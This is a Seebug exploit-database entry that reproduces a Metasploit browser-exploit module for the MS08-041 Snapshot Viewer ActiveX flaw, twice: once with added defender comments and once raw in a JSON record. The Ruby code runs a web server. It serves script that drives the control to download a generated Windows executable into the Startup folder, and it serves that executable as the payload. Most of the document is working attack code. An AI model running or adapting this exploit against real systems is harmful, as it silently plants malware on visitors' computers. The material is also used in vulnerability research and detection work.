ID SSV:71119
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source.
##
# $Id: ms08_041_snapshotviewer.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Metasploit browser-exploit module for the Microsoft Office Snapshot Viewer
# ActiveX control issue tracked as CVE-2008-2463 / MS08-041 (see 'References').
#
# The module runs an HTTP server (HttpServer::HTML mixin) that answers two kinds
# of request: an HTML page whose script drives the ActiveX control, and a
# "/payload" URL that returns a generated Windows executable.
#
# Defender notes, derived from the code below:
# * Remediation is the vendor fix referenced as MS08-041; on unpatched hosts the
#   control should not be scriptable from Internet Explorer.
# * The served page instantiates the ProgID 'snpvw.Snapshot Viewer Control.1',
#   sets SnapshotPath to an http:// URL and CompressedPath to a local *.exe path,
#   then calls PrintSnapshot(). That combination is the stable indicator; the
#   script variable name and the executable file name are randomized per request.
# * The default PATH option is the All Users Startup folder, so a new executable
#   written there by a browser process is a useful host-side detection point.
class Metasploit3 < Msf::Exploit::Remote
# Module ranking constant read by the framework.
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
# Registers the module metadata (name, references, payload constraints, target
# list) and the PATH option.
#
# info - Hash of metadata overrides merged through update_info.
def initialize(info = {})
super(update_info(info,
'Name' => 'Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download',
'Description' => %q{
This module allows remote attackers to place arbitrary files on a users file system
via the Microsoft Office Snapshot Viewer ActiveX Control.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 10394 $',
'References' =>
[
[ 'CVE', '2008-2463' ],
[ 'OSVDB', '46749'],
[ 'MSB', 'MS08-041' ],
[ 'BID', '30114' ],
],
'Payload' =>
{
'Space' => 2048,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 07 2008'))
# PATH is required and is the directory on the client where the file is written.
# The default is the All Users Startup folder; it is interpolated unchanged into
# the served script as the CompressedPath prefix.
register_options(
[
OptString.new('PATH', [ true, 'The path to place the executable.', 'C:\\\\Documents and Settings\\\\All Users\\\\Start Menu\\\\Programs\\\\Startup\\\\']),
], self.class)
end
# Always returns false.
# NOTE(review): presumably opts the module out of automated module selection;
# confirm against the framework's autofilter contract.
def autofilter
false
end
# Delegates to use_zlib, a helper defined outside this file.
# NOTE(review): presumably verifies zlib support is available; confirm.
def check_dependencies
use_zlib
end
# HTTP request callback: serves either the executable or the HTML page.
#
# cli     - client connection; peerhost and peerport are read from it.
# request - incoming HTTP request; only request.uri is inspected.
def on_request_uri(cli, request)
# Build the absolute URL the control is told to fetch. When SRVHOST is the
# wildcard address, the local source address used to reach this client is
# substituted instead.
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
# NOTE(review): String#+ here assumes datastore['SRVPORT'] is a String - confirm.
payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
# The match is unanchored: any request URI containing "payload" takes this
# branch and receives the executable as application/octet-stream.
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
data = generate_payload_exe({ :code => p.encoded })
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end
# Per-request random identifiers: the script variable name is 1-100 letters and
# the file name 1-20 letters, so neither is usable as a detection signature.
vname = rand_text_alpha(rand(100) + 1)
exe = rand_text_alpha(rand(20) + 1)
# HTML served to the browser. The script creates the Snapshot Viewer control,
# points SnapshotPath at payload_url and CompressedPath at PATH plus the random
# *.exe name, then calls PrintSnapshot(). Any script error sends the browser to
# about:blank.
content = %Q|
<html>
<head>
<script>
try {
var #{vname} = new ActiveXObject('snpvw.Snapshot Viewer Control.1');
#{vname}.SnapshotPath = "#{payload_url}";
#{vname}.CompressedPath = "#{datastore['PATH']}\\#{exe}.exe";
#{vname}.PrintSnapshot();
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
</html>
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, content)
# handler is provided by the framework, outside this file.
handler(cli)
end
end
{"href": "https://www.seebug.org/vuldb/ssvid-71119", "status": "cve,poc,details", "history": [], "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71119", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n ##\r\n# $Id: ms08_041_snapshotviewer.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module allows remote attackers to place arbitrary files on a users file system\r\n\t\t\t\tvia the Microsoft Office Snapshot Viewer ActiveX Control.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-2463' ],\r\n\t\t\t\t\t[ 'OSVDB', '46749'],\r\n\t\t\t\t\t[ 'MSB', 'MS08-041' ],\r\n\t\t\t\t\t[ 'BID', '30114' ],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2048,\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 
0,\r\n\t\t\t'DisclosureDate' => 'Jul 07 2008'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('PATH', [ true, 'The path to place the executable.', 'C:\\\\\\\\Documents and Settings\\\\\\\\All Users\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup\\\\\\\\']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tpayload_url = "http://"\r\n\t\tpayload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n\t\tpayload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"\r\n\r\n\t\tif (request.uri.match(/payload/))\r\n\t\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\t\t\tdata = generate_payload_exe({ :code => p.encoded })\r\n\t\t\tprint_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")\r\n\t\t\tsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tvname = rand_text_alpha(rand(100) + 1)\r\n\t\texe = rand_text_alpha(rand(20) + 1)\r\n\r\n\t\tcontent = %Q|\r\n\t\t<html>\r\n\t\t<head>\r\n\t\t\t<script>\r\n\t\t\ttry {\r\n\t\t\t\tvar #{vname} = new ActiveXObject('snpvw.Snapshot Viewer Control.1');\r\n\t\t\t\t#{vname}.SnapshotPath = "#{payload_url}";\r\n\t\t\t\t#{vname}.CompressedPath = "#{datastore['PATH']}\\\\#{exe}.exe";\r\n\t\t\t\t#{vname}.PrintSnapshot();\r\n\t\t\t} catch( e ) { window.location = 'about:blank' ; }\r\n\t\t\t</script>\r\n\t\t</head>\r\n\t\t</html>\r\n\t\t\t\t|\r\n\r\n\t\tprint_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")\r\n\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\thandler(cli)\r\n\r\n\tend\r\n\r\nend\r\n\n ", "id": "SSV:71119", "enchantments_done": [], "_object_type": "robots.models.seebug.SeebugBulletin", "type": "seebug", "lastseen": "2017-11-19T16:41:23", "reporter": "Root", "_object_types": 
["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2017-11-19T16:41:23"}, "dependencies": {"references": [], "modified": "2017-11-19T16:41:23"}, "vulnersScore": -0.2}, "objectVersion": "1.4", "references": []}
{}